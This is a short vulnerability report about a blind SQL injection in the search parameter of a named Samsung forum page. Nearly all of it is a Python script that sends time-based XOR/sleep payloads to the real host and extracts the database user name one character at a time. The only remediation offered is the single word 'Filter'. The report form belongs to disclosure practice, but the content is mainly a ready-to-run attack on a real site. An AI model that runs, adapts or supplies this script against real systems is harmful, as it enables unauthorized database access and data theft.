One MySQL blind note (with python verification script) from a website of Samsung Group)

One MySQL blind note (with python verification script) from a website of Samsung Group)

A MySQL blind injection on a site of Samsung Group has a high speed of guessing and is attached with a python verification script.

The injection point is located:

http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123

The searchQry parameter can be injected.
 

Guess the user and get:
 

sgsguser@localhost

 

Verification script:
 

#encoding=gbkimport httplibimport timeimport stringimport sysimport randomimport urllibheaders = {    'Cookie': '',    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)for i in range(0,10):    payloads.append(str(i))payloads += ['@','_', '.']print 'start to retrive MySQL user:'user = ''for i in range(1,30,1):    for payload in payloads:        try:            conn = httplib.HTTPConnection('www.sgsg.samsung.com', timeout=5)            rand_num = str(random.random())            s = "123'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),0))OR'bbb" % (i, ord(payload) )            conn.request(method='GET',                         url='/forum/qna.do?pageNo=1&searchQry=' + urllib.quote(s),                         headers = headers)            start_time = time.time()            html_doc = conn.getresponse().read()            conn.close()            print '.',        except:            user += payload            print '\n[in progress]', user            breakprint '\nMySQL user is', user

 

Solution:

Filter